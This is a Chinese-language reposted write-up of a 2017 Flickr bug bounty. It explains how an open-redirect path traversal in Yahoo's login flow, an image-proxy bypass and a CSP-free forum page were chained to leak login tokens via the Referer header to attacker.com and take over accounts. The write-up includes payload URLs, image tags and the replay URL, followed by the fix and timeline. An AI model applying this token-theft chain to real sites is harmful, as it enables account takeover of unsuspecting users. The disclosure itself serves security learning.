價值7k美刀的Flickr網站漏洞是怎麼樣的?
Flickr是雅虎旗下圖片分享網站,Reizelman發現該網站存在三個漏洞,三個漏洞相互配合使用,可以接管他人Flickr帳戶。
Flickr.com登錄流程概述
https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=H6T9XcS72e4mRnW3NpTAiU8ZkA--&.intl=il&.lang=en&mg=1&.done=https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=JvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done =https://www.flickr.com/signin/yahoo/?redir=https://www.flickr.com/null
以上網址是Yahoo帳戶登錄頁面,用戶被提示輸入他的賬戶密碼。輸入賬戶密碼並單擊登錄後,如果賬戶密碼有效,則將其重定向到以下Flickr url:
https://www.flickr.com/signin/yahoo/?redir=https%3A%2F%2Fwww.flickr.com%2F&.data=&.ys=
Reizelman通過觀察,如果用戶已經登錄到Yahoo,再點擊登錄鏈接:
https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=H6T9XcS72e4mRnW3NpTAiU8ZkA--&.intl=il&.lang=en&mg=1&.done=https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=JvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done =https://www.flickr.com/signin/yahoo/?redir=https://www.flickr.com/
驗證的流程發生在後台,用戶不需要在Yahoo域輸入他的賬戶密碼,即可完成flickr網站登錄認證。
這種的驗證方式可能引發其他用戶的賬戶被黑客接管,因為用戶只需點擊單個鏈接(如在某些OAuth實現中)來進行身份驗證,這樣他就可以進行身份驗證。熟悉了登錄的流程,進行尋找是否有會被他人賬戶被黑客接管的風險。
通過以上的url我發現,我可以控制.done這個參數,該參數控制了登錄token的發送位置,看起來雅虎只驗證https://www.flickr.com/signin/yahoo/這種開頭的域,但是我們仍然可以附加../所以如果我們將../../test附加到.done參數 .ys及.data的Token將被發送到https://www.flickr.com/test頁面。
經過一番查找,我找到了這個頁面:https://www.flickr.com/html.gne?tighten=0&type=comment,可以在Flickr評論頁面中插入圖片。我覺得也許可以在評論插入一個外鏈圖片,Toeken將通過referer欄位發送到我控制的機器上,我發表了一個評論插入了圖片。
/img src=「https://attacker.com/someimage.jpg」/
該圖像確實插入在評論中了,但是src值成如下連接:
這實際是雅虎的代理,把用戶上傳圖片,自己保存,通過代理的方式來載入顯示,不去請求外部的伺服器。但是,如果我使用一些技巧,我可以操縱Flickr圖像處理邏輯。發布了以下評論:
/img src=「//www.attacker.com/someimage.jpg」/
該注釋未被代理操作,並且src保持原樣,按理說圖片會顯示在評論中,但是,有遇到一個問題了,網站使用了Content-Security-Policy(CSP),img-src屬性定義了,只能從以下的網站載入圖片。因為我們插入圖片的網址不是白名單內的,是無法載入的。
Content-Security-Policy:img-src data: blob: https://*.flickr.com https://*.flickr.net http://*.flickr.net https://*.staticflickr.com http://*.staticflickr.com https://*.yimg.com https://*.yahoo.com https://*.cedexis.com https://*.cedexis-test.com https://*.cedexis-radar.net https://sb.scorecardresearch.com https://image.maps.api.here.com https://csync.yahooapis.com https://*.paypal.com https://*.pinterest.com http://*.static-alpha.flickr.com https://geo-um.btrll.com https://connect.facebook.net https://*.facebook.com https://bs.serving-sys.com https://*.adserver.yahoo.com https://*.maps.api.here.com https://*.maps.cit.api.here.com https://*.ads.yahoo.com https://secure.footprint.net
知道這一點後,我嘗試在其他頁面尋找可評論的地方,過了一段時間,找到了一個論壇頁面,www.flickr.com/help/forum/en-us/。這個頁面支持HTML代碼插入功能的評論,更爽的是https://www.flickr.com/help/forum/*這個網站都沒用使用CSP。
/ img src =「 / / www.attacker.com/someimage.jpg」/
一個外部的圖片被插入到這裡:
所以我現在要做的就是構造最終的url,如下:
GET https://www.attacker.com/someimage.jpg HTTP/1.1 Host: www.attacker.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept: image/webp,image/*,*/*;q=0.8 Referer: https://www.flickr.com/help/forum/en-us/72157668446997150/page14/?.data=&.ys= Accept-Encoding: gzip, deflate, sdch, br Accept-Language: he-IL,he;q=0.8,en-US;q=0.6,en;q=0.4,es;q=0.
可以看到Referer欄位的含有.data=&.ys=,將要發送到指定的網址,而這個網站是我們控制的,可以拿到Rerferer信息。
攻擊者通過referer拿到token之後,構造攻擊url,如下
https://www.flickr.com/signin/yahoo/?.data=&。ys = {replied referer
即可登錄到受害者的賬戶。
修復
雅虎通過以下的辦法來解決這個漏洞。
1. login.yahoo.com端點上的.done參數僅允許https://www.flickr.com/signin/yahoo/作為有效值。
2.使用「/ / 」的插入的圖片也是固定的。
3.現在CSP應用於Flickr論壇。
修復時間線
2017年4月2日 - 通過Hackerone的初步報告
2017年4月3日 - 報告舉報
2017年4月10日 - 報告已解決
2017年4月21日 - 7K $獎賞獎勵
TAG:嘶吼RoarTalk |
※這是一個有故事的網站——StoryCrafts.co
※the ordinary倒閉skin food破產,然而他們的產品卻賣到購物網站癱瘓
※eosleo.io是模仿eosbet的一個詐騙網站
※BCH應用開發的門戶網站:developer.bitcoin.com
※Dover Street Market Los Angeles 官方網站正式上線
※數字視頻廣告現狀:門戶網站衰落,YouTube依舊稱霸,Facebook、Twitter奮起直追
※WordPress的Total Donations插件存在漏洞,使任何人都能登錄網站
※Chromium版Microsoft Edge現在可以將網站固定到任務欄
※繼Gawker、Mic之後,Bustle Digital Group再出手收購科技網站Outline
※Shopify網站如何接入Asiabill收款方式?
※中東團購網站Cobone如何?Cobone是一個怎樣的平台?
※Google、YouTube成美國人最愛上網站,Reddit超Facebook躋身前三
※疑似AMD Flute SoC現身評分網站,或為Project Scarlett核心
※realme 5 Pro?realme新機現身跑分網站
※谷歌、YouTube成美國人最愛網站,Reddit超Facebook躋身前三
※蘋果更新 MacBook Air 和入門款 Pro;滴滴宣布北京調價;Zoom 現漏洞:任何網站可劫持 Mac 攝像頭
※谷歌自研Fuchsia系統網站上線 取代Android和Chrome OS
※Mozilla 推出網站隔離功能 Project Fission
※資訊丨帶勁!侃爺真和 xx 網站 Pornhub 做衣服了,virgil 要和香檳聯名?
※美國網站買的Coach包包,為什麼made in china?其他包包也會嗎